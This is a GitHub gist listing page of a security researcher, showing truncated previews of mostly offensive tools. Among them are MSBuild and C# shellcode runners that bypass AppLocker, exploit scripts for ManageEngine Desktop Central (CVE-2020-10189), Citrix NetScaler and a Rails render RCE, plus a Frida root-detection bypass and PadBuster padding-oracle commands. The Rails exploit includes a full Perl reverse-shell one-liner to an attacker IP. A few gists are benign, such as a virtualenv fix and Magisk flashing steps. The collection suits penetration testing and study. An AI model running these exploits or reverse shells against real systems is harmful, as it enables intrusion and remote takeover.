Skip to content

Instantly share code, notes, and snippets.

LongCat pich4ya

Block or report user

Report or block pich4ya

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
View magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
@pich4ya
pich4ya / readme_render_exploit.py
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
View readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
View netscaler_exploit.py
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / secureRootCert1.java
Last active Nov 29, 2019
วิธีการไม่ trust all HTTPS cert เวลาต่อ internal API ที่ API server ใช้ cert ที่ issue มาจาก internal root CA
View secureRootCert1.java
/*
ต้อง
- แน่ใจว่ามีไฟล์ root certificate แล้ว
- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default
วิธีการ
1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
@pich4ya
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
View root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / padbuster_macos2019.txt
Created Aug 5, 2019
Install PadBuster on macOS Mojave 10.14.5
View padbuster_macos2019.txt
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster
perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
You can’t perform that action at this time.